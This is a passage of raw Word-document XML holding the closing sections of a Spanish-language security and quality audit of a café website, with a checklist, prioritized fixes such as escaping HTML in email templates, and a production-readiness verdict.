              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A110A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Mantenibilidad</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1A110A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">87</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1A110A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">-1 (headers duplicados, sin tests de autogestión)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Checklist final</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4C6E3E"/>
        </w:rPr>
        <w:t xml:space="preserve">✅  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">CSP estricta sin unsafe-inline en scripts, HSTS, X-Frame-Options, Permissions-Policy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4C6E3E"/>
        </w:rPr>
        <w:t xml:space="preserve">✅  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">RLS habilitada en todas las tablas; INSERT anónimo solo donde debe existir</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4C6E3E"/>
        </w:rPr>
        <w:t xml:space="preserve">✅  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Sin SQL injection posible (PostgREST + funciones parametrizadas)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4C6E3E"/>
        </w:rPr>
        <w:t xml:space="preserve">✅  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Panel admin: escHtml() aplicado de forma consistente en todo el HTML generado dinámicamente</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4C6E3E"/>
        </w:rPr>
        <w:t xml:space="preserve">✅  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">gestionar.js usa textContent en todo momento — sin XSS DOM en la página de autogestión</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4C6E3E"/>
        </w:rPr>
        <w:t xml:space="preserve">✅  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Rate limiting anti-spam por IP (hash SHA-256, 4/hora · 10/día) + anonimización RGPD a 30 días</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4C6E3E"/>
        </w:rPr>
        <w:t xml:space="preserve">✅  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Longitud acotada en nombre/teléfono/email/notas; personas validado 1-80</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4C6E3E"/>
        </w:rPr>
        <w:t xml:space="preserve">✅  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Secretos (Resend, webhook, cron) solo en variables de entorno de servidor; config.js fuera de git</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4C6E3E"/>
        </w:rPr>
        <w:t xml:space="preserve">✅  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Librerías autoalojadas (supabase-js, fuentes) — sin dependencia de CDN de terceros</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4C6E3E"/>
        </w:rPr>
        <w:t xml:space="preserve">✅  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Accesibilidad: skip-link, landmarks, aria-pressed/aria-sort/aria-current, prefers-reduced-motion, labels</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4C6E3E"/>
        </w:rPr>
        <w:t xml:space="preserve">✅  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">SEO: canonical, hreflang, Open Graph, Twitter Cards, JSON-LD y sitemap bien construidos</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4C6E3E"/>
        </w:rPr>
        <w:t xml:space="preserve">✅  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Tests E2E (Playwright) del wizard de reservas y flujo admin, en CI, siempre contra modo demo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="B8833A"/>
        </w:rPr>
        <w:t xml:space="preserve">⚠  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Sin CHECK de formato en reservas.hora (V-02)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="B8833A"/>
        </w:rPr>
        <w:t xml:space="preserve">⚠  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">RLS de reservas basada en "autenticado", no en rol admin explícito (V-04)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="B8833A"/>
        </w:rPr>
        <w:t xml:space="preserve">⚠  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Sin tests E2E de autogestión, precios, cierres ni horarios editables (features del 19-21 jul)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="B8833A"/>
        </w:rPr>
        <w:t xml:space="preserve">⚠  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Headers duplicados entre netlify.toml y _headers (V-06)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="B8833A"/>
        </w:rPr>
        <w:t xml:space="preserve">⚠  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">canonical/OG/sitemap apuntan al dominio antiguo — pendiente de migración aprobada por el cliente</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="B85032"/>
        </w:rPr>
        <w:t xml:space="preserve">❌  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Inyección HTML sin escapar en las plantillas de email de confirmación y recordatorio (V-01)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Acciones priorizadas (de mayor a menor impacto)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
        <w:t xml:space="preserve">Escapar HTML en las plantillas de email (V-01) — confirmar-reserva/index.ts y recordatorio-reserva/index.ts. 10 minutos, sin dependencias.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Añadir el CHECK de formato a reservas.hora (V-02) — nueva migración SQL, supabase db push.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sanear el mensaje de error de modificar_reserva_token (V-03) — mismo archivo de migración que el punto anterior.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Confirmar en Supabase Auth que el alta pública está desactivada y dejarlo documentado (V-04).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Añadir tests E2E de autogestión, precios, cierres y horarios editables antes de considerar el admin "cerrado".</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El día que se apruebe el cambio de dominio: actualizar canonical/hreflang/OG/sitemap/robots.txt y las variables SITE_URL de las Edge Functions en un mismo commit (V-05).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cuando existan fotos reales del local, sustituir los placeholders de Unsplash por WebP/AVIF autoalojados (pendiente ya señalado en la auditoría del 10-jul).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Veredicto</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">La web está lista para producción. La arquitectura (Supabase + RLS + funciones SECURITY DEFINER + sitio estático sin dependencias de servidor propio) es sólida y ya ha sido validada en dos auditorías previas; esta pasada final no ha encontrado nada que obligue a rediseñar nada. El único hallazgo que de verdad importa (V-01) es una escapada de dos strings en dos archivos, no un problema de diseño, y ninguno de los seis hallazgos afecta a datos ya existentes ni requiere downtime para corregirse. Recomendación: aplicar V-01, V-02 y V-03 (juntos, menos de una hora de trabajo) antes de anunciar el sitio o de compartir el enlace públicamente; el resto de puntos son mejoras incrementales que pueden abordarse con calma.</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C4E"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">Página </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="6B5C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5C4E"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">Mesón Cafetería de Eiffel — Auditoría final exhaustiva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1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33A" w:sz="6"/>
      </w:pBdr>
      <w:spacing w:after="160" w:before="360"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="5C3317"/>
      <w:sz w:val="30"/>
      <w:szCs w:val="30"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="Heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:after="120" w:before="260"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="5C331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2026-07-21T21:51:27.891Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-07-21T21:51:27.901Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>